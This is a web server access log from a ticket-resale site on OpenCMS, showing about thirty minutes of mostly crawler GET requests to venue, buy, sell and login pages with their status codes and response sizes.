66.249.74.6 - - [13/Feb/2025:23:32:34 +0100] "GET /ticket2/opencms/en/venue/?countryid=9F359E38-9140-4AB1-4689-B4648FEDC1F9 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:33:17 +0100] "GET /ticket2/opencms/en/venue/?countryid=459C4D64-7B2E-6369-FD2D-87A9A9E5A61A HTTP/1.1" 200 93453
66.249.74.7 - - [13/Feb/2025:23:33:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=C02FA7EF-C506-8CCA-9C06-722A0E6233D0 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:33:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=BD065C1D-5EB9-6471-371C-1A2F19BD7F92 HTTP/1.1" 200 101876
111.7.96.148 - - [13/Feb/2025:23:34:10 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.74.7 - - [13/Feb/2025:23:37:07 +0100] "GET /ticket2/opencms/en/venue/?countryid=FF003B65-76E6-22ED-7100-B7664691B6BF HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:23:37:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=93055F81-99D6-0EE6-3CC8-FB4301992434 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:23:37:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=7A0460DD-50B2-C9A6-7233-3106FD73A000 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:23:40:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=87FD5C2F-6CC8-7245-5B03-4D8F2D8C8375 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:23:40:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=B1E58C49-66C4-8DF4-D222-33EDBDF73F09 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:23:44:38 +0100] "GET /ticket2/opencms/en/sport/football-tickets/ HTTP/1.1" 200 65660
66.249.74.6 - - [13/Feb/2025:23:45:25 +0100] "GET /ticket2/opencms/en/venue/?countryid=AC4C45B6-62CE-9E4E-735C-3EDAF240E46F HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:23:45:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=0B8FEDC3-C68A-3535-943E-BD0B117D00A8 HTTP/1.1" 200 94133
185.242.226.109 - - [13/Feb/2025:23:46:26 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.242.226.109 - - [13/Feb/2025:23:46:27 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
193.68.89.10 - - [13/Feb/2025:23:50:18 +0100] "GET / HTTP/1.1" 404 -
66.249.74.8 - - [13/Feb/2025:23:52:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=469E8114-EEB1-DED6-F49A-3A2498C21B30 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:23:53:20 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=E961462E-5AC2-64D6-5850-A310C9DEAA06 HTTP/1.1" 200 75657
66.249.74.6 - - [13/Feb/2025:23:53:30 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 70147
66.249.74.7 - - [13/Feb/2025:23:54:30 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A9E385E-33D9-328E-DC79-CA2C7009C829 HTTP/1.1" 200 75653
66.249.74.7 - - [13/Feb/2025:23:55:41 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=F03B8ADD-988E-AE6A-8DBA-AF502C691C60 HTTP/1.1" 200 75660
66.249.74.7 - - [13/Feb/2025:23:57:40 +0100] "GET /ticket2/opencms/sv/sell/ HTTP/1.1" 302 -
66.249.74.7 - - [13/Feb/2025:23:57:42 +0100] "GET /ticket2/opencms/sv/login/?url=/sv/sell/ HTTP/1.1" 200 67145
66.249.74.8 - - [13/Feb/2025:23:58:41 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0 HTTP/1.1" 200 78625
66.249.74.6 - - [13/Feb/2025:23:59:34 +0100] "GET /ticket2/opencms/sv/login/ HTTP/1.1" 200 67145